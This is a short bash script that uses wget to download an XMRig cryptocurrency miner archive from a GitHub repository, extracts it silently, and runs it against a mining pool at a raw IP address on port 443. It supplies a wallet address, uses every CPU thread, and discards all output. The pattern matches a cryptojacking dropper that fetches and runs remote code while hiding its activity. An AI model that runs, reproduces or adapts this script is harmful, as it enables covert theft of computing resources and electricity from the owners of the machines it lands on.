#!/bin/bash
wget https://github.com/Adeemar7/all/raw/main/xmrig.tar.gz && tar -xvf xmrig.tar.gz >/dev/null 2>&1
./xmrig --donate-level 1 -o 157.230.45.175:443 -u SaLvs7xoujM3ktisuDsDW85KvC1kHZTHwM356bH1jeoUcdrMGKzgsbSihAa1E2E1F8ewD6dwe8GXPHG4Xabu5jhGb4xJaDqTAG4 -p 5akun -a rx/0 -t $(nproc --all) >/dev/null 2>&1
